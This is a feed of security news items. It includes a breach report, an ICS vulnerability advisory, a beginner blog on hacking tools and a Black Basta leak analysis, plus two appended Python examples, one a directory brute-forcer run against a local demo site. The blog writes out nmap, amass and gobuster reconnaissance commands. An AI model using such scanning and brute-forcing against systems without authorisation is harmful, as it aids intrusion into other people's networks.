North Korean IT workers are reportedly using real-time deepfakes to secure remote work, raising serious security concerns. We explore the implications. The post False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation appeared first on Unit 42.
by Palo Alto Networks - Unit42
2025-04-21 09:52:33
Funding round secures $10M for Cy4Data Labs
SiliconAngle reports that Cy4Data Labs, a California-based data protection startup, has obtained $10 million from its initial funding round, which will be allocated toward bolstering sales and marketing for its Cy4Secure data security solution that allows in-use data encryption and protection.
by SC Media
2025-04-21 09:51:27
DOGE's AI use raises concern among House Dems
U.S. Office of Management and Budget Director Russell Vought has been urged by a group of 48 House Democrats to provide more details regarding unauthorized artificial intelligence usage by the Elon Musk-led Department of Government Efficiency, FedScoop reports.
by SC Media
2025-04-21 09:47:19
Bruce Schneier tackles AI hype, NSA surveillance, and cyber 'rage fatigue'
Bruce Schneier on security theater, AI snake oil, and the limits of cryptographic morality.
by SC Media
2025-04-21 09:44:25
Lantronix Device Used in Critical Infrastructure Exposes Systems to Remote Hacking
Lantronix’s XPort device is affected by a critical vulnerability that can be used for takeover and disruption, including in the energy sector. The post Lantronix Device Used in Critical Infrastructure Exposes Systems to Remote Hacking appeared first on SecurityWeek.
by SecurityWeek
2025-04-21 09:41:12
US indicts Nemesis Market founder over criminal activity
Cybernews reports that dark web marketplace Nemesis Market had its founder Behrouz Parsarad indicted by the U.S.
by SC Media
2025-04-21 09:39:00
Federal charges filed against alleged SmokeLoader malware operator
Alleged SmokeLoader botnet operator Nicholas Moses, also known as "scrublord", has been charged by federal prosecutors with a count of conspiracy to commit fraud and other computer-related activity over the compromise of more than 65,000 individuals' personal data and credentials with the malware, reports The Record, a news site by cybersecurity firm Recorded Future.
by SC Media
2025-04-21 09:35:51
Zoom’s Remote Control Feature Exploited in ELUSIVE COMET Attacks
A new campaign by ELUSIVE COMET, a threat actor responsible for large-scale cryptocurrency thefts, exploits Zoom's remote control feature through social engineering. The attack came to light when Dan Guido, CEO of Trail of Bits, received a fraudulent interview request supposedly from “Bloomberg Crypto” via Twitter. The request, routed through unofficial Calendly links and Gmail … The post Zoom’s Remote Control Feature Exploited in ELUSIVE COMET Attacks appeared first on CyberInsider.
by Cyber Insider
2025-04-21 09:24:17
New sophisticated malware SuperCard X targets Androids via NFC relay attacks
‘SuperCard X’ – a new MaaS – targets Androids via NFC relay attacks, enabling fraudulent POS and ATM transactions with stolen card data. Cleafy researchers discovered a new malware-as-a-service (MaaS) called SuperCard X targeting Android devices with NFC relay attacks for fraudulent cash-outs. Attackers promote the MaaS through Telegram channels, analysis shows SuperCard X builds […]
by Security Affairs
2025-04-21 09:10:00
AI Generates Loads of Carbon Emissions. It's Starting to Cut Them, Too
Shrinking the world's carbon footprint will require poring over vast datasets to spot solutions — something computers do better and faster than humans.
by ITPro Today
2025-04-21 09:00:00
WordPress ad-fraud plugins generated 1.4 billion ad requests per day
A large-scale ad fraud operation called 'Scallywag' is monetizing pirating and URL shortening sites through specially crafted WordPress plugins that generate billions of daily fraudulent requests. [...]
by BleepingComputer
2025-04-21 09:00:00
What is a brute-force attack?
A brute-force attack is a trial-and-error hacking method cybercriminals use to decode login information and encryption keys to gain unauthorized access to systems.
by ComputerWeekly
2025-04-21 09:00:00
Introduction to SQL Commands, Part 2: Adding, Updating Data
This installment of our three-part series on SQL commands explores essential SQL commands for inserting, modifying, and deleting data within a SQL Server table.
by ITPro Today
2025-04-21 09:00:00
Turn to Exposure Management to Prioritize Risks Based on Business Impact
Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, Tenable CSO Robert Huber shares practical advice on using an exposure management program to focus on risks that have business impact. You can read the entire Exposure Management Academy series here.

There’s a trap security practitioners can often fall into. No, it’s not some tactic employed by the bad guys to trip us up. It’s a fairly simple trick of the mind: thinking that every risk deserves urgent attention. Maybe it’s human nature. If there’s a problem — no matter how big or small — some of us are just wired to want to fix it right away and get it off our punch list. But I’ve learned the hard way that not all risks are created equal. So treating each one as number-one priority is a surefire shortcut to burnout and inefficiency.

Like many of you, here at Tenable, we’ve been building our own internal exposure management program. On this journey, one of the most profound lessons I’ve learned is to prioritize risk based on business impact. Moving to that line of thinking has helped me bring clarity to chaos. It has reduced the noise and allowed me to focus myself and my team on what really matters, which is the key to a successful exposure management program.

Start with the right data

One of the big struggles for security professionals is context switching. When you meet with your business leaders to update them, you often have to scramble to pull together inputs from a dozen different tools and teams. That’s because the data is siloed, often incomplete and nearly impossible to compare. Our job in security is to provide these leaders — maybe your CEO or head of a business unit — with a clear, coherent picture of the most acute exposures. Try as we might, those pictures have been partly cloudy with a chance of inaccuracies.

So, as we started on the exposure management journey, our initial step was to assimilate the data. And I mean all of it. With help from Vulcan (now part of Tenable), we combed through tools, platforms and teams for every scrap of data. Believe me, until you do that, you can’t prioritize meaningfully. You’re just guessing.

Understand risk in context

OK, bringing all that data together was a huge task. You’ll probably think, “Mission accomplished!” But that’s just the start.

Once the data’s in one place, the real work begins. That’s when I ask: What does this risk mean in context?

You should look at it from a couple of angles: First, consider it in the context of other risks across your organization. Then, think about the risks in the context of the business itself. How could this risk affect your revenue, operations or reputation? If you don’t think this way right off the bat, you’ll just end up reacting to the loudest alert, not the most important one. And we know how that goes. As I heard often during officer candidate school in the military: focus on the important, not the urgent — which is especially helpful when you don’t have enough time in the day.

Identify the systemic issues

Exposure management isn’t about patching one vulnerability at a time. It’s about identifying what I call the big rocks. Whatever you call them, these are systemic issues that affect thousands of assets or users. Left unaddressed, they can truly put the business at risk.

Sometimes we don’t fix those big rocks right away. That might be because a patch broke a critical system or legacy infrastructure doesn’t support a specific control. When that happens, the exposure becomes a tracked business risk on our risk register. And it stays on the radar until we resolve it.

That’s a big shift from the old model, where issues could disappear into ticket queues with no clear owner and no resolution in sight. With exposure management platforms, leadership and even the board can have their eyes on these issues. That’s because we’re aligning security priorities with business priorities.

Clearly communicate risk

Of course, none of this works unless you communicate clearly. And communication can be a big challenge. You could use simple traffic light charts (i.e., red, yellow, green) to represent control coverage. But how do you accurately assign those colors? It can be a subjective exercise based more on your gut than real data. With exposure management software, your eventual goal should be to make that process quantitative and, ideally, real-time so you don’t have to pull a team off their work every quarter to do manual updates. Soon, we’ll live in a world where the moment something changes, we’ll see it communicated immediately. With that instantaneous information at our disposal, we’ll decide whether to act, defer or escalate.

Manage change so it doesn’t manage you

Exposure management isn’t just a technical shift. It’s a change management exercise. You’re asking teams to work differently, respond to new priorities and trust a centralized system that makes decisions based on data that might be unfamiliar.

That kind of shift takes time. It requires building relationships, clarifying expectations and iterating on the program until it works for everyone. As my colleague Arnie Cabral wrote in What it Takes to Start the Exposure Management Journey, we’ve started by rebuilding our policies, defining roles and responsibilities and ensuring that the people doing the work know exactly what’s expected — and why.

Takeaways: This is the path forward

We’re in the early days of this exposure management journey. And some of our industry certifications and policies still require us to fix everything above a certain CVSS score, whether or not it truly poses a threat. So there will be a level of reconciliation ahead between traditional compliance models and this more pragmatic, business-aligned approach.

But I believe exposure management, when done right, can bridge that gap. It will give you the ability to say, “These are the risks that matter most — and here’s why.”

That’s how you’ll make better decisions in the long run. You’ll better protect your business. And you’ll move security from reactive to strategic.

Have a question about exposure management you’d like us to tackle?

We’re all ears. Share your question and maybe we’ll feature it in a future post.
by Tenable
2025-04-21 08:11:41
Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware
Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER. Check Point Research team reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) is behind a sophisticated phishing campaign targeting European diplomatic entities, using a new WINELOADER variant and a previously unknown malware called GRAPELOADER. “While the […]
by Security Affairs
2025-04-21 08:00:49
Phishing attacks leveraging HTML code inside SVG files
Attackers are increasingly sending phishing emails with SVG attachments that contain embedded HTML pages or JavaScript code.
by Securelist
2025-04-21 07:32:16
Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8)
Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More → The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.
by Help Net Security
2025-04-21 07:22:59
Ahold Delhaize USA Confirms Data Stolen in 2024 Cyberattack
Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024. The company shared an update on Thursday, revealing that hackers managed to extract files from internal business systems connected to the earlier security breach. "Based on our investigation to date, we believe certain files were taken from some of our internal U.S. business systems in connection with the prior cybersecurity issue," read the company's statement.

Ahold Delhaize USA operates over 2,000 grocery stores across the country, including major names like Stop & Shop, Food Lion, Giant Food, and Hannaford. In November 2024, the company reported disruptions that impacted online grocery ordering and caused temporary website outages for some of its supermarket chains. The company acted quickly at that time to restore its operations. “Our teams have been working diligently to determine what information may have been affected,” the company stated in its latest update.

Ongoing Investigation of Ahold Delhaize USA Reveals Data Theft

The Ahold Delhaize cyberattack has now been linked to the theft of certain files from internal U.S. business systems. While Ahold Delhaize USA did not detail exactly what kind of data was taken, it has assured that its teams are working hard to determine what information may have been affected. “We will notify affected individuals in accordance with our legal obligations,” the company said. Law enforcement agencies have also been informed and updated about the development. The company emphasized that protecting the information of its customers, employees, and vendors remains a top priority.

INC Ransom Gang Takes Responsibility

The INC Ransom gang has come forward, claiming responsibility for the cyberattack on Ahold Delhaize. In a post made earlier this week, the cybercriminal group claimed it stole six terabytes of data from Ahold Delhaize USA. As of this writing, The Cyber Express has reached out to Ahold Delhaize for further clarification regarding this claim, but the company has not responded.

Who is INC Ransom?

According to cybersecurity researchers at Cyble, INC Ransom (also known by the alias GOLD IONIC) is a highly active ransomware and extortion group. The group has been operating since at least July 2023 and has targeted a broad spectrum of industries worldwide, including healthcare, education, government, and now retail. INC Ransom is known for its advanced attack methods, often using multiple tools and malware families to infiltrate systems and steal data. These include:

AdFind – A tool used to gather information from Active Directory environments
PsExec – A command-line tool used to execute processes on remote systems
Rclone – A command-line program used to manage files on cloud storage platforms

The group’s reach is global, with confirmed attacks in countries such as the United States, the United Kingdom, Australia, France, Germany, Italy, the Philippines, and many more.

A Series of Global Cyberattacks

The Ahold Delhaize USA cyberattack is not the first major attack claimed by INC Ransom. In June 2024, the group was allegedly behind a cyberattack on ControlNET LLC, a U.S.-based provider of building technology solutions. ControlNET specializes in HVAC, lighting, video surveillance, access control, and power systems. In that case, the ransomware group not only claimed to have gained access to the company’s network but also released sensitive information to back their claims. The leaked data included:

Invoice records
Building floor plans
Internal email communications
Sample project folders involving ControlNET’s clients

INC Ransom also claimed to have targeted Rockford Public Schools as part of the same attack vector, suggesting a potential supply chain risk.

Why This Matters

Cyberattacks like these are a growing concern for companies and consumers alike. For organizations such as Ahold Delhaize USA, which rely on technology to manage inventory, process payments, and offer online services, even a short disruption can cause significant operational and financial harm. When customer or employee data is involved, the risks extend far beyond temporary inconvenience. Leaked data can include sensitive personal information that could be used in phishing scams, identity theft, or even targeted attacks on individuals and other companies. The fact that INC Ransom claims to have stolen six terabytes of data is alarming. While Ahold Delhaize USA has not confirmed the volume or nature of the stolen information, such a large quantity could potentially include anything from employee records and vendor contracts to internal communications and system configurations.

What Consumers Should Do

If you shop at Stop & Shop, Hannaford, Food Lion, or Giant Food, keep an eye out for communications from the company. If your data was involved, you should receive an official notice with next steps. In the meantime, customers are advised to:

Monitor their email and bank accounts for unusual activity
Be cautious of phishing attempts pretending to be from Ahold Delhaize or its supermarket brands
Change passwords for online accounts related to grocery shopping, especially if the same password is used elsewhere

As ransomware groups like INC Ransom continue to adapt and strike globally, companies must prioritize cybersecurity at every level—from their internal systems to vendor relationships and beyond.
by The Cyber Express
2025-04-21 07:01:00
A week in security (April 12 – April 18)
A list of topics we covered in the week of April 12 to April 18 of 2025
by Malwarebytes Labs
2025-04-21 05:54:30
Yokogawa Recorder Vulnerability Could Let Attackers Hijack Critical Industrial Systems
A high-severity vulnerability has been discovered in a range of industrial recorder and data acquisition systems produced by Yokogawa Electric Corporation, a Japan-based automation and measurement equipment manufacturer. This flaw has been identified as CVE-2025-1863 and is categorized under CWE-306: Missing Authentication for Critical Function. The issue carries a CVSS v4 base score of 9.3 and a CVSS v3.1 score of 9.8, highlighting the extreme risk it poses to affected systems.

Overview of Yokogawa Vulnerability

The vulnerability is linked to insecure default settings in Yokogawa’s recorder products. Specifically, authentication is disabled by default on several of these devices. This means that when the devices are connected to a network without any configuration changes, anyone with network access can gain full access to critical functions—including system settings and operational controls. Such unrestricted access allows an attacker to manipulate measured values, alter system settings, and potentially compromise the integrity of critical operations in sectors like manufacturing, energy, and agriculture.

Affected Yokogawa Products

The vulnerability affects a wide range of Yokogawa’s paperless recorders and data acquisition units. The following models and versions are impacted:

GX10 / GX20 / GP10 / GP20 Paperless Recorders: R5.04.01 and earlier
GM Data Acquisition System: R5.05.01 and earlier
DX1000 / DX2000 / DX1000N Paperless Recorders: R4.21 and earlier
FX1000 Paperless Recorders: R1.31 and earlier
μR10000 / μR20000 Chart Recorders: R1.51 and earlier
MW100 Data Acquisition Units: All versions
DX1000T / DX2000T Paperless Recorders: All versions
CX1000 / CX2000 Paperless Recorders: All versions

These devices are commonly used in critical infrastructure environments worldwide, including industrial manufacturing facilities, energy plants, and food processing units.

Vulnerability Impact

According to the technical evaluation, the Yokogawa vulnerability can be exploited remotely and with low attack complexity. No authentication or user interaction is needed, making it an attractive target for cyber attackers. The ability to manipulate sensitive data and operational settings without proper access control could result in:

Incorrect measurements and faulty process outcomes
Data integrity compromise
Downtime in production lines
Safety hazards in automated environments

The threat becomes even more critical due to the default-disabled authentication, which implies that unless a user has manually enabled access controls, their systems are likely exposed.

Technical Analysis

The Yokogawa vulnerability stems from the absence of an enforced authentication mechanism in the default configuration of affected devices. In systems where authentication is not manually activated, any user on the network can access all critical device functions, including:

Configuration of sensors and thresholds
Adjustment of logging parameters
Export and modification of stored data

The CVSS v4 vector string for this vulnerability is:

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

This reflects:

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Confidentiality, Integrity, and Availability Impact: High

The vulnerability was discovered and disclosed by Souvik Kandar from MicroSec (microsec.io) and was coordinated with the Cybersecurity and Infrastructure Security Agency (CISA).

Yokogawa’s Mitigation Measures

Yokogawa has issued guidance for all users of the affected products. Key recommendations include:

Enable Authentication: Immediately activate the login function (authentication feature) on all affected devices if they are connected to a network.
Change Default Passwords: After enabling authentication, update the default credentials to strong, unique passwords to prevent unauthorized access.
Implement a Comprehensive Security Program: Yokogawa strongly recommends a complete security strategy that includes:

Patch management and regular firmware updates
Anti-virus deployment
Data backup and recovery plans
Network zoning and segmentation
System hardening
Application and device whitelisting
Proper firewall configuration

The company also offers security risk assessments to help customers evaluate and improve their current security posture.

Impacted Industries and Global Reach

Given the widespread use of Yokogawa recorders in automation and critical systems, this Yokogawa vulnerability has implications across several sectors:

Critical Manufacturing: Automated production environments rely heavily on precise data logging and process control. Manipulation of recorder settings could lead to costly downtime or product defects.
Energy: In power plants and substations, these devices often monitor critical parameters. A security breach could result in operational disruption or even physical damage.
Food and Agriculture: Accurate recording of environmental data is essential for food safety and quality. An attacker could alter data to mask spoilage or unsafe conditions.

The default disabled authentication presents a critical security gap that can be easily closed with proper configuration. However, the responsibility lies with users and system integrators to follow through with security best practices.

Conclusion

Industrial operators must not assume out-of-the-box configurations are secure, especially when deploying devices in critical environments. As threat actors increasingly target operational technology (OT) systems, proactive device hardening and security governance become non-negotiable. Addressing this vulnerability promptly will not only secure your systems but also ensure continuity, safety, and reliability in critical operations.
by The Cyber Express
2025-04-21 05:30:55
Hawk Eye: Open-source scanner uncovers secrets and PII across platformsHawk Eye is an open-source tool that helps find sensitive data before it leaks. It runs from the command line and checks many types of storage for PII and secrets: passwords, API keys, and personal information. “Unlike most open-source tools that only scan cloud buckets for PII, this solution is designed for deep integration across your entire ecosystem. It supports 350+ file types (including videos, images, and documents), uses advanced OCR, and ensures complete data … More → The post Hawk Eye: Open-source scanner uncovers secrets and PII across platforms appeared first on Help Net Security.
by Help Net Security
2025-04-21 05:00:26
Cybercriminals blend AI and social engineering to bypass detectionAttackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Top five attack tactics Initial access: Initial access remains the most frequently observed adversarial tactic, representing more than 27% of escalated alerts. In 2024, … More → The post Cybercriminals blend AI and social engineering to bypass detection appeared first on Help Net Security.
by Help Net Security
2025-04-21 05:00:00
How next-generation firewalls are evolving in a world of AI-enabled cyberattacksDiscover how Next-Generation Firewalls are adapting to combat AI-enabled cyberattacks and evolving to protect organizations in today's dynamic threat landscape.
by Cybersecurity Dive
2025-04-21 04:30:13
Cyber threats now a daily reality for one in three businessesBusinesses are losing out on an average of $98.5 million a year as a consequence of cyber threats, fraud, regulatory hurdles and operational inefficiencies, according to research from FIS and Oxford Economics. The cost of disharmony is highest among technology companies, followed by insurance, financial services and fintech respondents. The study revealed nine sources of disharmony, defined as disruptions and inefficiencies across the money lifecycle, with the most significant ones including: 88% of respondents identified … More → The post Cyber threats now a daily reality for one in three businesses appeared first on Help Net Security.
by Help Net Security
2025-04-21 04:19:38
Free TryHackMe Jr Penetration Tester Roadmap with Resources and LabsA free, TryHackMe-inspired roadmap with resources and labs to kickstart your penetration testing journey.Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-04-21 04:18:02
5 Tools I Wish I Knew When I Started Hacking

As I entered the world of hacking and cybersecurity, I was bombarded with the quantity of tools available. Each YouTube video, course, or website had a list of “must-have” tools that differed from one another, and I had no idea where to begin. After a while, I tried, messed up, learned, and ultimately discovered which tools actually helped.

5 Hacking Tools

Here in this blog, I would like to introduce five hacking tools that I wish I had known about when I was beginning to hack. They are easy to use for beginners, immensely powerful, and immensely popular across the industry. If you are new, or even if you are experienced, these can become your new go-to’s.

Burp Suite
Category: Web Application Testing
Why It’s Useful: Intercept and tamper with web traffic.

When I first started web hacking, I was doing a lot of manual testing: viewing HTML source code, using browser developer tools, or executing simple scripts. I had heard of Burp Suite but steered clear of it because it seemed daunting. Big mistake.

Burp Suite is a Swiss Army knife for web application penetration testing. It lets you:
- Intercept HTTP/HTTPS traffic between your browser and the target site.
- Alter requests and responses in real time.
- Test inputs repeatedly with Intruder.
- Spider sites to crawl all accessible pages.
- Scan for typical web vulnerabilities (Pro version).

I now use Burp Suite for nearly all web app testing. Even the free version is extremely capable and more than sufficient for beginners.

Pro tip: Pair Burp Suite Community Edition with FoxyProxy in Firefox to redirect traffic through Burp with a single click.

Nmap
Category: Network Scanning
Why It’s Useful: Find open ports, services, and vulnerabilities.

Initially, I downplayed Nmap. I assumed that it was “just a port scanner.” But the more I delved, the more I appreciated how useful and versatile it is. Nmap is capable of:
- Discovering live hosts on a network.
- Scanning open ports and the services they are running.
- Guessing operating systems and hardware information.
- Executing scripts with the NSE (Nmap Scripting Engine) to identify vulnerabilities.

For instance, this command gives you a lot of information:
nmap -sC -sV -A target.com
It performs a default script scan (-sC), version detection (-sV), and an aggressive scan (-A) all at once.

Pro tip: When doing CTFs or actual testing, always begin with Nmap to get the lay of the land.

Amass
Category: Reconnaissance / Subdomain Enumeration
Why It’s Useful: Discover hidden subdomains and widen the attack surface you can test.

Recon is perhaps the most important aspect of ethical hacking. The better you know your target, the higher your chances of discovering vulnerabilities. When I began, I relied on basic tools such as sublist3r or online subdomain finders. But Amass revolutionized everything. Amass is an incredibly useful tool for:
- Finding subdomains from multiple data sources.
- Mapping domain relationships.
- Performing active and passive recon.

A simple command such as:
amass enum -d example.com
can expose dozens of subdomains you might not have discovered otherwise.

Pro tip: Cross-reference Amass findings with tools such as httpx to see which subdomains are alive and accessible.

CyberChef
Category: Data Encoding/Decoding
Why It’s Useful: Rapidly transform, encode, decode, or inspect data.

I used to spend hours trying to manually decode base64 or writing Python scripts just to XOR-decrypt a string. Then I stumbled upon CyberChef, and it was like magic. CyberChef is a browser-based tool by GCHQ (the UK’s intelligence agency). It enables you to perform a variety of data operations including:
- Base64 encode/decode
- Hex to ASCII
- XOR encryption/decryption
- Hashing (MD5, SHA256, etc.)
- JWT analysis
- Regex extraction

It’s drag-and-drop simple: you pile up different “operations” in a pipeline. Super intuitive, super quick.

Pro tip: Bookmark CyberChef (https://gchq.github.io/CyberChef/); it’ll save you hundreds of hours.

Gobuster
Category: Directory/Content Enumeration
Why It’s Handy: Find hidden directories and files on web servers.

Ever gone to a website and wondered, “There’s more to this”? That’s where Gobuster comes in. It brute-forces files and directories on a web server with a wordlist.
gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
It attempts hundreds or thousands of typical folder and file names to find hidden pages such as:
- /admin
- /login
- /backup.zip

Why should this matter? Often, these pages aren’t referenced from anywhere on the website. Discovering them can expose tasty vulnerabilities.

Tip: Use Gobuster with a decent wordlist such as SecLists, and look at the various status codes it reports (e.g., 200, 403, 301).

Final Thoughts

Hacking is half creativity and attitude, and half tools. But the proper tools can make you a superhero, allowing you to automate drudgery, discover previously unknown weaknesses, and get things done more quickly. These five tools (Burp Suite, Nmap, Amass, CyberChef, and Gobuster) are ones I’ve always regretted not mastering sooner. If you’re just beginning, I wholeheartedly urge you to dive into each of them individually. Not only learn how to use them, but also why they function the way they do. And don’t forget: tools change, but knowledge remains.

Bonus Tips
- Don’t attempt to learn everything at once. Learn one, practice it in a lab or CTF, and proceed to the next.
- Keep yourself updated. Most tools receive new features or bug fixes on a regular basis.
- Monitor the GitHub repos of these tools for updates and read their documentation.

Originally published at OpenExploit.in

5 Tools I Wish I Knew When I Started Hacking was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
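The Gobuster section above says what the tool does but not why the status codes matter. The following is an added example, not code from the post or from the Gobuster project: it builds a constructed target site in a temporary directory, serves it on a loopback port, and runs a minimal directory brute-forcer over a constructed wordlist. The site layout, the wordlist, and the rule that /secret answers 403 are all assumptions made for the demo. The point it shows is that redirects must not be followed (a 301 on /admin is the evidence that /admin/ exists) and that 403 is a hit, not a miss.

```python
import functools
import http.server
import os
import tempfile
import threading
import urllib.error
import urllib.request

# Constructed wordlist standing in for a SecLists/dirbuster list (example only).
WORDLIST = ["admin", "login", "backup.zip", "secret", "images", "robots.txt"]


def build_site(root):
    """Constructed target: nothing on the index page links to the hidden paths."""
    os.makedirs(os.path.join(root, "admin"))
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html><body><a href='/'>home</a></body></html>")
    with open(os.path.join(root, "admin", "index.html"), "w") as f:
        f.write("<h1>admin panel</h1>")
    with open(os.path.join(root, "backup.zip"), "wb") as f:
        f.write(b"PK\x05\x06" + b"\x00" * 18)  # a valid empty zip archive


class SiteHandler(http.server.SimpleHTTPRequestHandler):
    """Static file server with one extra rule: /secret exists but is forbidden (403)."""

    def do_GET(self):
        if self.path.split("?", 1)[0].rstrip("/") == "/secret":
            self.send_error(403)
            return
        super().do_GET()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server(root):
    handler = functools.partial(SiteHandler, directory=root)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 301 on /admin is itself the signal that /admin/ exists."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def brute_force(base_url, wordlist, interesting=(200, 301, 403)):
    """Request base_url/<word> for every word and keep those whose status is interesting.

    200 = present, 301 = a directory (trailing-slash redirect), 403 = present but
    access denied. 404 responses are discarded as noise, as gobuster does by default.
    """
    opener = urllib.request.build_opener(NoRedirect)
    found = {}
    for word in wordlist:
        try:
            with opener.open(f"{base_url}/{word}", timeout=5) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code  # non-2xx (including the unfollowed 301) arrives here
        if status in interesting:
            found[word] = status
    return found


def run_demo():
    root = tempfile.mkdtemp()
    build_site(root)
    server, base_url = start_server(root)
    try:
        return brute_force(base_url, WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for path, status in sorted(run_demo().items()):
        print(f"{status} /{path}")
```

The /login and /images entries come back 404 and are dropped; /admin is reported as 301 rather than disappearing behind an automatically followed redirect, which is exactly the case the "scan various status codes" tip is about.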
2025-04-21 04:17:51
Black Basta Leak Analysis

Analysing the Matrix server chat log data dump from the notorious Black Basta ransomware group.

On the 20th of February 2025, the Matrix server chat logs from the notorious ransomware group Black Basta were uploaded to MEGA. This caused a wave of activity from cyber security firms and individuals looking for needles in the 200k message haystack. The leak provides a fascinating peek behind the curtain of a major ransomware operation and an opportunity to identify data trends.

Working Hours

From September 2023 until June 2024, the Black Basta chat server was most active each week from approximately 07:00 until 21:00. The number of messages sent on Friday afternoons differed from those on other afternoons in the week, and weekends were much quieter.
Figure: A heat map of message activity on the Black Basta Matrix server

Ransom Negotiations

During active ransomware negotiations (Volex, True and Ascension Health), Black Basta members communicated with each other using more expletives than usual.
Figure: Graph showing the number of expletives used throughout the year in relation to key negotiation events
When these negotiations were taking place, specific user message volume patterns outlined the lead members.
Figure: Charts showing the number of messages sent by Black Basta members during periods of negotiation
Some members appeared to be involved in all negotiation discussions:
- GG
- lapa
- yy
whilst other members only appeared to be related to certain events:
- W (Volex)
- n3auxaxl (True)
- nickolas (Ascension Health)

Communication Changes

Throughout the year, the collective emotions of the group would change depending on the situation they were in.
Figure: Graph showing the number of phrases relating to emotions throughout the year in relation to key negotiation events
Excitement was typically expressed in and around major ransomware negotiations, sprinkled with small spikes of frustration. On average, the longest messages were sent early in the morning at 02:00 whilst the shortest messages were typically sent in the evening at 19:00.
Figure: Chart showing the average message length over the average day

Relationships

The number of times Black Basta members make reference to other group members gives an idea of the potential links within the group.
Figure: Graph showing the number of times each Black Basta member mentioned each other
The high number of connections highlighted the amount of communication that took place within the group. Connections of note include:
- GG → lapa
- GG → W
- SS → cameron777
- W → SS
- Dburito → n3auxaxl

Conclusion

The Black Basta leak lays bare a year of ransomware operations, revealing distinct patterns in activity, communication, and group dynamics. Structured working hours and heightened exchanges during negotiations paint a picture of an organized effort shaped by key contributors and shifting priorities.

Black Basta Leak Analysis was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
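The post describes its measurements (hour-of-day and weekday volume, average message length by hour, and a sender-to-mentioned graph) but not how they were computed. The following is an added example, not the author's code, that implements those measurements over a handful of constructed messages; the messages, timestamps and member handles below are made up for illustration and are not taken from the leak, and the tuple shape (ISO timestamp, sender, text) is an assumed export format.

```python
import re
from collections import Counter
from datetime import datetime

# Assumed member handles (illustrative; the leak's real roster is larger).
MEMBERS = ["gg", "lapa", "yy", "w", "ss"]

# Constructed sample messages shaped like an export: (ISO timestamp, sender, text).
# Not real leak content.
MESSAGES = [
    ("2024-03-04T07:15:00", "gg", "lapa check the target list"),
    ("2024-03-04T07:20:00", "lapa", "gg on it"),
    ("2024-03-04T13:05:00", "w", "ss can you ping them again"),
    ("2024-03-04T13:30:00", "ss", "w done, waiting"),
    ("2024-03-05T02:00:00", "gg", "lapa w here is the long one: full breakdown of "
                                  "tonight's numbers and every note we have"),
    ("2024-03-05T09:45:00", "lapa", "ok"),
    ("2024-03-06T19:00:00", "gg", "w?"),
    ("2024-03-09T11:00:00", "ss", "gg quiet day"),  # a Saturday
]


def parse(messages):
    return [(datetime.fromisoformat(ts), sender, text) for ts, sender, text in messages]


def messages_per_hour(messages):
    """Hour-of-day histogram: the basis of the working-hours heat map."""
    return Counter(ts.hour for ts, _, _ in parse(messages))


def messages_per_weekday(messages):
    return Counter(ts.strftime("%A") for ts, _, _ in parse(messages))


def weekend_share(messages):
    """Fraction of all messages sent on Saturday or Sunday."""
    parsed = parse(messages)
    weekend = sum(1 for ts, _, _ in parsed if ts.weekday() >= 5)
    return weekend / len(parsed)


def avg_length_by_hour(messages):
    """Mean message length per hour-of-day (the 02:00 vs 19:00 observation)."""
    total, count = Counter(), Counter()
    for ts, _, text in parse(messages):
        total[ts.hour] += len(text)
        count[ts.hour] += 1
    return {hour: total[hour] / count[hour] for hour in count}


def mention_graph(messages, members=MEMBERS):
    """Directed edge counts sender -> mentioned member, one count per message.

    Whole-word matching keeps a handle like "w" from matching inside "waiting".
    Self-mentions are ignored.
    """
    pattern = re.compile(r"\b(" + "|".join(map(re.escape, members)) + r")\b", re.IGNORECASE)
    edges = Counter()
    for _, sender, text in parse(messages):
        for name in set(m.lower() for m in pattern.findall(text)):
            if name != sender.lower():
                edges[(sender.lower(), name)] += 1
    return edges


def top_connections(messages, n=3):
    """The strongest sender -> mentioned links, i.e. the 'connections of note'."""
    return mention_graph(messages).most_common(n)


if __name__ == "__main__":
    print("per hour:", dict(sorted(messages_per_hour(MESSAGES).items())))
    print("per weekday:", dict(messages_per_weekday(MESSAGES)))
    print("weekend share:", weekend_share(MESSAGES))
    print("avg length by hour:", avg_length_by_hour(MESSAGES))
    print("top connections:", top_connections(MESSAGES))
```

On a real export the same functions run unchanged once the messages are loaded into the (timestamp, sender, text) shape; the member list should be built from the set of senders rather than hard-coded.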
2025-04-21 04:17:40
